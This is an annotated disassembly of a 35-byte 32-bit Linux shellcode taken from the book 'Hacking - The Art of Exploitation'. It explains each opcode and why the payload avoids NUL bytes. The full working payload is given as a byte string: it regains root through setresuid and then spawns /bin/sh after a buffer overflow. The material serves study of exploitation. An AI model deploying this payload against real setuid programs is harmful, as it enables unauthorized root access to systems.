/*register ids (the 3-bit register numbers used in the ModR/M reg and r/m fields, and as r in the 50+r PUSH / 58+r POP encodings below):
eax = 0 = 000
ecx = 1 = 001
edx = 2 = 010
ebx = 3 = 011
esp = 4 = 100
ebp = 5 = 101
esi = 6 = 110
edi = 7 = 111*/
shellcode: \x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80
from "Hacking - The Art of Exploitation", in source file "exploit_notesearch.c". It is the payload injected by a buffer overflow to spawn a shell. Target: 32-bit x86 Linux (system calls via int $0x80, arguments in ebx, ecx, edx). The 35 bytes contain no 0x00 byte, which matters whenever the payload is copied by a NUL-terminated string routine.
OPCODE MNEMONIC OPERANDS (AT&T syntax: source first, destination last)
\x31 \xc0 XOR %eax, %eax ;eax = 0. xor reg,reg is the 2-byte NUL-free zeroing idiom ("mov $0, %eax" would embed 0x00 bytes)
\x31 \xdb XOR %ebx, %ebx ;ebx = 0
\x31 \xc9 XOR %ecx, %ecx ;ecx = 0
\x99 CDQ ;sign-extend eax into edx:eax. Opcode 0x99 is CDQ with the 32-bit operand size used here (it is CWD only under a 16-bit operand size); eax is already 0, so this zeroes edx in a single byte
\xb0 \xa4 MOV $0xa4, %al ;eax = 0xa4 = 164 = __NR_setresuid (32-bit Linux). Writing only %al keeps the upper bytes zero and avoids a 32-bit immediate containing 0x00
\xcd \x80 INT $0x80 ;setresuid(ruid=ebx=0, euid=ecx=0, suid=edx=0): re-establishes full root privileges if the exploited program is setuid-root (harmless otherwise). The return value (0 or -errno) is left in eax
\x6a \x0b PUSH $0xb ;push the 8-bit immediate 0xb, sign-extended to a 32-bit stack slot
\x58 POP %eax ;eax = 0xb = 11 = __NR_execve (opcode 58+r, r = register id). push/pop sets all 32 bits of eax in 3 NUL-free bytes: "mov $0xb, %eax" would embed 0x00 bytes, and "mov $0xb, %al" is unsafe because eax holds the setresuid return value, not 0
\x51 PUSH %ecx ;ecx is still 0: this is the NUL terminator for the string built next (opcode 50+r)
\x68 \x2f \x2f \x73 \x68 PUSH $0x68732f2f ;push a 32-bit immediate (pushl, not pushq: this is 32-bit code). Stored little-endian the bytes 2f 2f 73 68 spell "//sh"
\x68 \x2f \x62 \x69 \x6e PUSH $0x6e69622f ;bytes 2f 62 69 6e = "/bin". The stack now holds "/bin//sh\0" starting at esp; the doubled slash pads the path to 8 bytes without a NUL and the kernel treats "/bin//sh" as "/bin/sh"
\x89 \xe3 MOV %esp, %ebx ;ebx = esp = address of "/bin//sh" -> execve argument 1 (filename). Opcode 0x89 stores reg into r/m; ModR/M 0xe3 has reg=esp (100) and r/m=ebx (011), so ebx is the destination, not esp
\x51 PUSH %ecx ;push a NULL pointer (ecx is still 0)
\x89 \xe2 MOV %esp, %edx ;edx = address of that NULL -> execve argument 3 (envp = empty environment)
\x53 PUSH %ebx ;push the pointer to "/bin//sh"
\x89 \xe1 MOV %esp, %ecx ;ecx = address of { ptr-to-"/bin//sh", NULL } -> execve argument 2 (argv)
\xcd \x80 INT $0x80 ;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) with eax=11, ebx=filename, ecx=argv, edx=envp
//Summary: setresuid(0,0,0) to regain root, then execve of /bin/sh with no arguments and an empty environment. On success the process image is replaced and nothing after this runs. If execve fails, eax holds -errno and execution continues into whatever bytes follow the payload in memory; there is no exit syscall, so failure is not handled.